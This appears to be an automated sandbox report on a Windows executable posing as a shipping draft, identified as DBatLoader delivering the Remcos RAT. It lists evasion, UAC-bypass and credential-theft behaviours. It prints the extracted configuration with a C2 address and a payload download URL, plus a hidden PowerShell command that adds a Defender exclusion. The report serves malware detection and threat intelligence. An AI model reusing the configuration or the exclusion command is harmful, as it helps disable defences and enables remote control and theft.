Windows Analysis Report
710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Overview

General Information

Sample name:	710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe
Analysis ID:	1465946
MD5:	4ee08be6bfe40c3fb09e904c35299000
SHA1:	9d8e0ebbaaa3598ed03f231267103f24f6c0dd85
SHA256:	e38d2d9b8b63dc2163897bfa2a8401a57483d39d0dace276f360be62cd938852
Tags:	exe
Infos:

Detection

DBatLoader, Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: TrustedPath UAC Bypass Pattern

UAC bypass detected (Fodhelper)

Yara detected DBatLoader

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to inject code into remote processes

Contains functionality to register a low level keyboard hook

Contains functionalty to change the wallpaper

Delayed program exit found

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Drops executables to the windows directory (C:\Windows) and starts them

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Opens network shares

Powershell is started from unusual location (likely to bypass HIPS)

Reads the Security eventlog

Reads the System eventlog

Sample uses process hollowing technique

Sigma detected: Execution from Suspicious Folder

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Parent in Public Folder Suspicious Process

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Writes to foreign memory regions

Yara detected WebBrowserPassView password recovery tool

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to enumerate running services

Contains functionality to launch a process as a different user

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Reg Add Open Command

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Keylogger Generic

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Signatures

AV Detection

Found malware configuration

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Malware Configuration Extractor: DBatLoader {"Download Url": ["https://onedrive.live.com/download?resid=7E01B4B465D32A9A%213365&authkey=!AAwtw4clrUPD3Bw"]}
Source: 00000000.00000002.4092451794.000000000097D000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: Remcos {"Host:Port:Password": "104.250.180.178:7902:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "CorelDraw.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "CorelDraw-OW5ET7", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for domain / URL

Source: 104.250.180.178

Virustotal: Detection: 12%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Glzskrlg.PIF

ReversingLabs: Detection: 31%

Multi AV Scanner detection for submitted file

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	ReversingLabs: Detection: 28%
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Virustotal: Detection: 27%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.1894385900.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4092451794.000000000097D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4092451794.0000000000929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.1856524613.0000000000796000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.1933047287.000000000078C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe PID: 7252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Glzskrlg.PIF PID: 7780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Glzskrlg.PIF PID: 7804, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for dropped file

Source: C:\Users\Public\Libraries\Glzskrlg.PIF

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27973837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,		0_2_27973837
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,		36_2_00404423

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4114575191.00000000279AB000.00000040.00001000.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_358adb91-9

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.1894385900.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Glzskrlg.PIF PID: 7780, type: MEMORYSTR

Privilege Escalation

UAC bypass detected (Fodhelper)

Source: C:\Users\Public\ger.exe

Registry value created: NULL C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"

Uses 32bit PE files

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown

HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49731 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: FodHelper.pdb source: extrac32.exe, 0000000C.00000002.1700608647.000002990FEE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000011.00000002.1741479037.00007FF6FEF9B000.00000002.00000001.01000000.0000000C.sdmp, per.exe, 00000011.00000000.1725970381.00007FF6FEF9B000.00000002.00000001.01000000.0000000C.sdmp, per.exe.12.dr
Source:	Binary string: cmd.pdbUGP source: alpha.exe, 00000005.00000000.1688796114.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000005.00000002.1689342424.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000006.00000002.1690283745.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000006.00000000.1689639944.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000007.00000002.1694341205.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000007.00000000.1690648593.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000009.00000000.1694761361.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000009.00000002.1698864034.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000B.00000002.1701033799.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000B.00000000.1699099885.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000D.00000000.1701529353.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000D.00000002.1725755882.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000F.00000002.1718992252.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000F.00000000.1717853353.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000016.00000002.1747179983.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000016.00000000.1742798028.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001A.00000002.1760150963.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001A.00000000.1747931853.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001C.00000002.1761722308.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001C.00000000.1760459517.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001D.00000002.1764581095.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001D.00000000.1762694348.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001E.00000000.1765484467.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001E.00000002.1766577849.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001F.00000002.1767658042.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001F.00000000.1766956821.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000020.00000002.1768771742.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000020.00000000.1767937417.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000021.00000002.1770379704.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000021.00000000.1769320960.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe,
Source:	Binary string: powershell.pdbUGP source: xkn.exe, 0000000E.00000000.1702252536.00007FF6996CA000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.10.dr
Source:	Binary string: easinvoker.pdbH source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: reg.pdb source: extrac32.exe, 00000008.00000002.1693775016.000001FEF3710000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000010.00000002.1718611375.00007FF7E0A40000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000010.00000000.1718136951.00007FF7E0A40000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.8.dr
Source:	Binary string: powershell.pdb source: xkn.exe, 0000000E.00000000.1702252536.00007FF6996CA000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.10.dr
Source:	Binary string: cmd.pdb source: alpha.exe, 00000005.00000000.1688796114.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000005.00000002.1689342424.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000006.00000002.1690283745.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000006.00000000.1689639944.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000007.00000002.1694341205.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000007.00000000.1690648593.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000009.00000000.1694761361.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000009.00000002.1698864034.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000B.00000002.1701033799.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000B.00000000.1699099885.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000D.00000000.1701529353.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000D.00000002.1725755882.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000F.00000002.1718992252.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000F.00000000.1717853353.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000016.00000002.1747179983.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000016.00000000.1742798028.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001A.00000002.1760150963.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001A.00000000.1747931853.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001C.00000002.1761722308.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001C.00000000.1760459517.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001D.00000002.1764581095.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001D.00000000.1762694348.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001E.00000000.1765484467.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001E.00000002.1766577849.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001F.00000002.1767658042.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001F.00000000.1766956821.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000020.00000002.1768771742.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000020.00000000.1767937417.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000021.00000002.1770379704.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000021.00000000.1769320960.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 000
Source:	Binary string: FodHelper.pdbGCTL source: extrac32.exe, 0000000C.00000002.1700608647.000002990FEE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000011.00000002.1741479037.00007FF6FEF9B000.00000002.00000001.01000000.0000000C.sdmp, per.exe, 00000011.00000000.1725970381.00007FF6FEF9B000.00000002.00000001.01000000.0000000C.sdmp, per.exe.12.dr
Source:	Binary string: reg.pdbGCTL source: extrac32.exe, 00000008.00000002.1693775016.000001FEF3710000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000010.00000002.1718611375.00007FF7E0A40000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000010.00000000.1718136951.00007FF7E0A40000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.8.dr

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_401010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_401010F1
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27949665 FindFirstFileW,FindNextFileW,FindClose,FindClose,	0_2_27949665
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2794BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	0_2_2794BD37
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2794BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	0_2_2794BB30
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2794C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	0_2_2794C34D
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2795C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	0_2_2795C291
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27959AF5 FindFirstFileW,	0_2_27959AF5
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2794880C FindFirstFileW,FindNextFileW,FindClose,	0_2_2794880C
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2794783C FindFirstFileW,FindNextFileW,	0_2_2794783C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	5_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	5_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	5_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	5_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose,	5_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	6_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	6_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	6_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	6_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe	Code function: 6_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose,	6_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	9_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	9_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	9_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	9_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe	Code function: 9_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose,	9_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	31_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	31_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	31_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	31_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe	Code function: 31_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose,	31_2_00007FF70CC97B4C
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	32_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	32_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	32_2_00007FF70CC735B8
